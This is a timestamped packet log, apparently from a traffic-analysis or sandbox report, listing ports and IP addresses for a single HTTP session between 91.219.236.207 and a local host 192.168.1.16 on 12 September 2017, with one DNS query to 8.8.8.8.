Sep 12, 2017 22:18:47.854772091 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.863787889 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.863804102 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.863993883 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:47.864015102 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.864357948 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.864368916 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.864520073 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:47.864545107 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.904350996 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.904370070 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.904385090 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.904625893 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:47.904664040 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.933598995 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.933625937 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.933847904 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:47.933878899 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.942573071 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.942615032 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.942794085 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:47.942837954 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.944104910 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.944113016 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.944545031 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:47.944586039 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.968581915 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.968597889 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.968770981 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:47.968812943 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.991580009 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.991617918 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:47.991846085 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:47.991888046 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.016144991 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.016175032 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.016294003 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.016311884 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.016324043 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.016325951 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:48.016362906 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.016642094 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.016663074 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.016818047 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:48.016859055 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.071991920 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.072031021 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.072043896 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.072170019 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:48.072194099 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.095037937 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.095062017 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.095148087 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:48.095169067 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.109874964 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.109894037 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.110038996 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:48.110066891 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.134974957 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.134994030 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.135162115 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:48.135205030 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.177349091 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.177395105 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.177651882 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:48.177692890 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.189862967 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.189901114 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.190090895 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:48.190121889 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.214437008 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.214463949 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.214601994 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:48.214632988 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.216167927 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.216206074 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.216484070 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:48.216500044 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.264254093 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.264295101 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.264450073 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:48.264473915 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.281706095 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.281733036 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.281872034 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:48.281898975 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.314301968 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.314331055 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.314464092 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.314486980 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.314502001 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.314555883 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:48.314574957 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.449565887 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.449599981 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.449776888 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:48.449800968 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.466615915 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.466650963 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.466816902 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:48.466840982 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.483416080 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.483442068 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.483603954 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:48.483666897 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.513547897 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.513577938 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.513988972 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:48.514010906 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.541477919 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.541507006 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.541523933 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.541543961 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.541559935 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.541766882 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:48.541799068 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.579309940 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.579334021 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.579454899 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:48.579482079 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.588213921 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.588238001 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.588557959 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:48.588592052 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.773236990 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.773273945 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.773304939 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.773392916 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:48.773432970 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.773978949 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:48.774197102 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.774233103 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.774255037 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.774472952 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.774498940 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.774626970 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:48.774661064 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.774710894 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.774744987 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.775101900 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:48.775145054 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.779555082 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:48.794573069 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.813978910 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.814006090 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.814220905 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:48.814265013 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.849570990 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.849591017 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.849867105 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:48.849962950 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.850604057 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.850625992 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.850752115 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:48.850815058 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.860780001 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.860809088 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.861059904 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:48.861131907 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.889576912 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.889596939 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.889929056 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:48.889997959 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.900065899 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.900165081 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.900322914 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:48.900392056 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.907900095 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.907928944 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.908143044 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:48.908216000 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.937041044 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.937067986 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.937295914 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:48.937367916 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.956804991 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.956834078 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.956842899 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.957094908 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:48.957154989 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.960701942 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.960733891 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.960880041 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:48.960931063 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.973706961 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.973747015 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.974111080 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:48.974181890 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.989938974 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.989979029 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:48.993438959 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:48.993479967 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.021356106 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.021398067 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.021661997 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:49.021735907 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.035262108 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.035296917 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.035515070 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:49.035569906 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.035743952 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.035758018 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.035962105 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:49.035984993 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.045145035 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.045171976 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.045358896 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:49.045404911 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.081955910 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.081990004 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.082227945 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:49.082295895 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.101422071 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.101452112 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.101731062 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:49.101778030 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.117024899 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.117067099 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.117367029 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:49.117429972 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.139504910 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.139543056 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.139595985 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.139755011 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:49.139828920 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.188827991 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.188857079 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.188868046 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.188875914 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.189114094 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:49.189157963 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.226059914 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.226084948 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.226092100 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.226219893 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:49.226247072 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.226860046 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.226878881 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.226988077 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:49.227008104 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.284178972 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.284212112 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.284379005 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:49.284404039 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.300061941 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.300091028 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.300256968 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:49.300278902 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.300574064 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.300591946 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.300664902 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:49.300682068 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.328474998 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:49.328504086 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.339401960 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.339426994 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.339646101 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:49.339665890 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.378339052 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.378374100 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.378550053 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:49.378575087 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.379446030 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.379463911 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.379569054 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:49.379590034 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.379961014 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.379976988 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.380053997 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:49.380073071 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.417720079 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.417762041 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.417778969 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.417891026 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:49.417922020 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.460768938 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.460819006 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.461019993 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:49.461050034 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.474519014 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.474546909 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.474761963 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:49.474787951 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.506078005 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.506118059 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.506239891 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:49.506266117 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.521585941 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.521629095 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.521744967 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:49.521775961 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.540678978 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.540714979 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.540859938 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:49.540890932 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.553762913 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.553787947 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.553951979 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:49.553980112 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.561609983 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.561633110 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.562192917 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:49.562216997 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.580873966 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.580933094 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.581043959 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:49.581057072 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.609841108 MESZ	56587	53	192.168.1.16	8.8.8.8
Sep 12, 2017 22:18:49.633948088 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.633994102 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.634087086 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:49.634111881 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.667424917 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.667448044 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.667845011 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:49.667876959 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.674097061 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.674115896 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.674247026 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:49.674268961 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.676058054 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.676074028 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.676155090 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:49.676177025 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.717251062 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:49.717283964 MESZ	80	49199	91.219.236.207	192.168.1.16
